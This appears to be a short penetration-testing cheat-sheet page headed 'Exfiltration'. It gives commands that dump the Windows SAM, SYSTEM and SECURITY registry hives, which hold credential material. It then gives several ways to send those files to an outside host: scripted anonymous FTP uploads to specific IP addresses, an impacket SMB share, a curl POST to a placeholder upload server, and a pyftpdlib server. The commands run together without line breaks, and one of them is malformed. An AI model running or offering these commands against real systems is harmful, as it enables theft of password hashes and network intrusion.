Exfiltration
reg.exe save HKLM\SAM C:\programdata\sam.bakreg.exe save HKLM\SYSTEM C:\programdata\system.bakreg.exe save HKLM\SECURITY C:\programdata\security.bakimpacket-smbserver share share/ -smb2supportecho open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt
ftp -v -n -s:ftp.txtpython3 -m uploadservercurl -X POST http://HOST/upload -H -F '[email protected]'OR
python -m pyftpdlib -p 21 --writeecho open 192.168.45.237 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txtftp -v -n -s:ftp.txtOR
Last updated